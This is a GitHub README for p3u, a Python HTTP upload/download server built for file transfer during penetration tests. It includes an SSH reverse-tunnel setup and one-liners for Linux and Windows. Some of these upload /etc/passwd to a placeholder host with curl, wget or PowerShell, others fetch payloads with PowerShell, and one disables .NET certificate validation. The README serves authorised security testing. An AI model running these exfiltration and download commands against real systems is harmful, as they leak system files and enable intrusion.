Skip to content
/ p3u Public

Python 3 Simple HTTP Upload/Download Script

Notifications You must be signed in to change notification settings

cmprmsd/p3u

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

p3u - Python 3 Uploader

Purpose

I needed a flexible and simple file upload and download tool with SSL support for local use at customer site during penetration tests. So I stumbled over the gist files already implementing it and modified them for my needs.

Feel free to contribute with PRs.

Script Usage

Use the following arguments:
p3u.py -l ip -p port -a user:password -c server.pem

Generate your cert with
p3u.py -g

Use remote Box for reverse proxy and ssl offloading:

  1. Configure your server with Let's Encrypt and nginx
  2. Add to the nginx.conf
location / {
        proxy_pass http://127.0.0.1:5555/;
}
  1. Connect to the server via SSH to establish the tunnel:
ssh -nNT -4 -R 5555:localhost:80 user@server -v
  1. Run p3u.py

This will handle and offload SSL connections on the server with certbot or similar without the need to run the challenge locally.

Data transfer examples

Download and Upload from Browser

Browser

Click, Click, Done

Downloading from Linux

wget

wget https://127.0.0.1:8888/file [--no-check-certificate] [--http-user user --http-password password]

curl

curl https://127.0.0.1:8888/file -O [--insecure] [--user user:password]

Uploading from Linux

curl

curl -F 'file=@/etc/passwd' [https://]127.0.0.1:8888 [--user user:password] [--insecure]

wget

(This one was fun to build)

filename=/etc/passwd && echo -e "----FILEUPLOAD\r\nContent-Disposition: form-data; name=\"file\"; filename=\"$filename\"\r\n" > /tmp/xyz-upload && cat $filename >> /tmp/xyz-upload && echo -e '\r\n----FILEUPLOAD--\r\n' >> /tmp/xyz-upload && wget --header="Content-type: multipart/form-data; boundary=--FILEUPLOAD" --post-file /tmp/xyz-upload [https://]127.0.0.1:8888 -qO- [--http-user user --http-password password] [--no-check-certificate] && rm /tmp/xyz-upload

Downloading from Windows

Powershell without authentication w/ .Net

$url="http[s]://127.0.0.1:8888/file"; (New-Object System.Net.WebClient).DownloadFile($url,$url.Substring($url.LastIndexOf("/") + 1))

Powershell without authentication w/o .Net

-SkipCertificateCheck is quite new: PowerShell/PowerShell#2006

$url="https://127.0.0.1:8888/passwd"; Invoke-WebRequest $url -OutFile $url.Substring($url.LastIndexOf("/") + 1) [-SkipCertificateCheck]

Handling invalid certificates in .Net

Add-Type -Language CSharp "namespace System.Net {public static class Util {public static void Init() {ServicePointManager.ServerCertificateValidationCallback = null;ServicePointManager.ServerCertificateValidationCallback += (sender, cert, chain, errs) => true;}}}"; [System.Net.Util]::Init();
<insert one of the powershell .Net payloads here>

Uploading stuff from Windows

Powershell without authentication w/ .Net

(New-Object Net.WebClient).UploadFile("http[s]://127.0.0.1:8888","/etc/passwd")

Powershell with authentication w/ .Net

$wc = New-Object System.Net.WebClient; $wc.Credentials = new-object System.Net.NetworkCredential("user","password"); $resp = $wc.UploadFile("http[s]://127.0.0.1:8888","/etc/passwd")

Handling invalid certificates in .Net

Add-Type -Language CSharp "namespace System.Net {public static class Util {public static void Init() {ServicePointManager.ServerCertificateValidationCallback = null;ServicePointManager.ServerCertificateValidationCallback += (sender, cert, chain, errs) => true;}}}"; [System.Net.Util]::Init();
<insert one of the powershell payloads here>

Credits

UniIsland & 4d4c for their initial work

About

Python 3 Simple HTTP Upload/Download Script

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages